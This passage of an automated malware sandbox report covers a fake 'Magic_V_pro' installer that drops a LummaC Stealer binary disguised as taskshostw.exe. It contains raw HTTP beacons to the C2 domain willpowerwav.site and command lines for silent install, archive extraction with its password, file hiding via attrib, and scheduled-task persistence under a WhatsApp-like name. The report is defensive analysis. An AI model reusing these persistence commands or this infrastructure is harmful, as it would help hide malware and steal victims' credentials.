                                                                                                                      2025-03-08 02:14:35 UTC16384INData Raw: 37 0d d2 a7 6b 90 a1 fc 4e ff 86 2e 36 82 77 d8 5d 8c c7 80 be e5 ba 9b c8 e8 1b bf 59 b1 f2 b5 38 84 ef f8 df 2a 14 91 01 a5 35 c7 62 52 69 50 93 2b fa ea 80 2d 27 63 a3 62 5d a1 d7 83 fb 33 96 1c 6d a5 15 3e 94 d2 f5 bb c5 23 32 86 7d a9 ed df 85 a2 7d 4d fb ba f1 fb 05 cd b8 71 1b 9f d2 e3 9e ca 6d 63 f4 70 ae 3f cc 39 dc df 52 61 76 65 9f b8 05 a3 c4 29 97 b2 a2 07 a5 1d c2 fe 39 57 fa 36 be 10 cf 9c 21 25 a5 45 75 01 69 ca 89 b7 13 cb c9 87 42 49 b5 03 39 ee e9 be 32 af 27 bd 68 57 fa 66 83 76 a2 ae ae 57 6d be 19 37 a0 95 5a 0e f3 f7 7e a0 ae 31 bd ad 35 f5 1c c3 73 99 a4 75 0e c1 0f 1c c1 d9 72 f5 b4 b9 2e 68 0d 66 2c 21 45 16 91 77 a3 f2 b3 32 d4 02 60 56 a4 cc 64 4e 87 97 aa a2 61 ca cd e9 79 76 b3 bd 6f df 55 9d d8 78 f9 a0 55 59 1c 35 af d5 8a
                                                                                                                      Data Ascii: 7kN.6w]Y8*5bRiP+-'cb]3m>#2}}Mqmcp?9Rave)9W6!%EuiBI92'hWfvWm7Z~15sur.hf,!Ew2`VdNayvoUxUY5
                                                                                                                      2025-03-08 02:14:35 UTC666INData Raw: 03 f7 6c de ef c6 3d 00 50 b3 d3 af e1 f1 8c 0a d8 f2 b5 6b 9e 3d 47 74 54 16 d5 e9 11 6e aa 27 3c 24 cf 8f a3 52 12 27 ba 44 da 5d 37 db f5 75 7a d9 77 ba 49 39 d1 ad 4d 6e 6e cf 14 ae ef bb 90 ec f2 92 d8 a6 68 39 f8 cb 7c fa 2a 87 7c 15 65 70 bd 8b fd e1 25 26 1c fe 09 da 9d 7e 75 4b 11 fd 4a 6c 12 3d d4 d5 bd dd 99 04 0c da f4 b6 b9 f3 3b b9 c2 14 38 9d f3 f6 80 be 98 14 94 b8 0c d9 ff 0e fd ac f5 c0 38 dd dd 97 c5 6b b0 9e cb a5 6f 53 0c 4e 9c db 1f 09 df d9 ac 28 d3 3b 38 65 76 6f 4e e7 c4 16 ca 6e 87 d4 a0 b7 05 6b 13 90 76 77 6c 65 77 77 9c 55 fc 4a 62 6c 09 b5 4e 29 5c e4 2e b7 58 81 cd f3 fa 81 f4 20 79 85 01 69 29 f2 a3 8c 11 f2 5d 23 b4 c6 5c 8c a5 68 a7 57 50 27 12 7c 29 ca b8 3e 45 da 36 cc 3d d5 5a 93 dc 60 4d ee 45 e3 5a 10 06 b1 29 52 ec
                                                                                                                      Data Ascii: l=Pk=GtTn'<$R'D]7uzwI9Mnnh9|*|ep%&~uKJl=;88koSN(;8evoNnkvwlewwUJblN)\.X yi)]#\hWP'|)>E6=Z`MEZ)R


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449727172.67.194.1654437772C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-03-08 02:14:49 UTC264OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 8
                                                                                                                      Host: willpowerwav.site
                                                                                                                      2025-03-08 02:14:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                      Data Ascii: act=life
                                                                                                                      2025-03-08 02:14:50 UTC564INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Sat, 08 Mar 2025 02:14:49 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJDNiZqPAS9JO10fMDiJ1YvHzS%2BxpmNuK5YO%2BsqbQPiKtTI%2Fgaci1NimzvulzcPDdkPxBFTeqjFJPKWJgz1auCndpQ2opPw8akM4i96k%2Bk0MJLD0pzxdtJ4m2gFvy3%2FDjsjGaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 91ced241b80f9035-BOS
                                                                                                                      2025-03-08 02:14:50 UTC805INData Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                      Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                      2025-03-08 02:14:50 UTC1369INData Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d
                                                                                                                      Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
                                                                                                                      2025-03-08 02:14:50 UTC1369INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72
                                                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
                                                                                                                      2025-03-08 02:14:50 UTC1014INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 31 2e 32 33 35 2e 39 33 2e 31 32 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61
                                                                                                                      Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">71.235.93.124</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><spa
                                                                                                                      2025-03-08 02:14:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.449729172.67.194.1654438128C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-03-08 02:15:41 UTC264OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 8
                                                                                                                      Host: willpowerwav.site
                                                                                                                      2025-03-08 02:15:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                      Data Ascii: act=life
                                                                                                                      2025-03-08 02:15:42 UTC200INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Sat, 08 Mar 2025 02:15:42 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 91ced38809a78f8d-BOS
                                                                                                                      2025-03-08 02:15:42 UTC1169INData Raw: 31 31 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                      Data Ascii: 1177<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                      2025-03-08 02:15:42 UTC1369INData Raw: 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66
                                                                                                                      Data Ascii: d><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf
                                                                                                                      2025-03-08 02:15:42 UTC1369INData Raw: 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: 0.1.1-/api"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p>
                                                                                                                      2025-03-08 02:15:42 UTC572INData Raw: 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d
                                                                                                                      Data Ascii: t>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-
                                                                                                                      2025-03-08 02:15:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:21:14:17
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:3'548'416 bytes
                                                                                                                      MD5 hash:4F4E6DD4D4B9D96E69B7F8F97E867023
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:21:14:18
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'541'056 bytes
                                                                                                                      MD5 hash:6C66FDD38C098F271FDE6E9E74DBD0EB
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:21:14:23
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:3'548'416 bytes
                                                                                                                      MD5 hash:4F4E6DD4D4B9D96E69B7F8F97E867023
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:21:14:23
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'541'056 bytes
                                                                                                                      MD5 hash:6C66FDD38C098F271FDE6E9E74DBD0EB
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:21:14:37
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8
                                                                                                                      Imagebase:0xff0000
                                                                                                                      File size:847'360 bytes
                                                                                                                      MD5 hash:6482EE0F372469D1190C74BD70D76153
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:21:14:37
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:21:14:38
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
                                                                                                                      Imagebase:0xc70000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:21:14:38
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:21:14:38
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
                                                                                                                      Imagebase:0x1b0000
                                                                                                                      File size:19'456 bytes
                                                                                                                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:21:14:38
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
                                                                                                                      Imagebase:0xfe0000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:16
                                                                                                                      Start time:21:14:38
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:17
                                                                                                                      Start time:21:14:40
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'427'456 bytes
                                                                                                                      MD5 hash:33645B3AFD79ED29F7E6F476D7F6ED4B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:18
                                                                                                                      Start time:21:14:41
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""
                                                                                                                      Imagebase:0xc70000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:19
                                                                                                                      Start time:21:14:41
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:22
                                                                                                                      Start time:21:15:37
                                                                                                                      Start date:07/03/2025
                                                                                                                      Path:C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\programs\common\taskshostw.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'427'456 bytes
                                                                                                                      MD5 hash:33645B3AFD79ED29F7E6F476D7F6ED4B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Has exited:true

                                                                                                                      Reset < >